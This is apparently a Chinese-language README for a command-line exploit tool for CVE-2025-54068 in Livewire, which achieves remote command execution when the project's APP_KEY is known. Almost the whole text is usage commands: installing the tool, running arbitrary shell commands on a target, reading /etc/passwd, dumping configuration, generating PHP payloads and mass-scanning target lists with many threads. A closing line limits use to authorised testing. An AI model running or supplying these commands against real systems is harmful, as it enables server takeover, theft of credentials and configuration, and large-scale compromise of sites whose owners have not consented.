一个设计用于利用 CVE-2025-54068 并在已知 Livewire 项目的 APP_KEY 时实现远程命令执行的工具。
此工具是 Synacktiv 原始项目的重新编码版本:
核心概念和方法基于原始实现。 此版本包含微小增强和附加功能,以提高可用性和灵活性。
使用 pipx 安装该工具:
pipx install git+https://github.com/haxorstars/CVE-2025-54068
或使用 uv:
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
针对单个目标运行工具:
livewire-rce-2025 -u target.com
使用自定义参数:
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
执行预定义的自定义功能:
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
在一条命令中组合多个功能:
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
使用您自己的 PHP 负载文件:
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
在不向目标发送的情况下生成负载:
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
或使用自定义 PHP 文件:
livewire-rce-2025 -generate-payload --custom-file custom.php
从文件中扫描多个目标:
livewire-rce-2025 -mass-check targets.txt -o results.json
使用自定义线程数:
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
此工具仅用于教育和授权的安全测试目的。请勿将其用于您不拥有或未经明确许可的系统。
祝您黑客愉快😄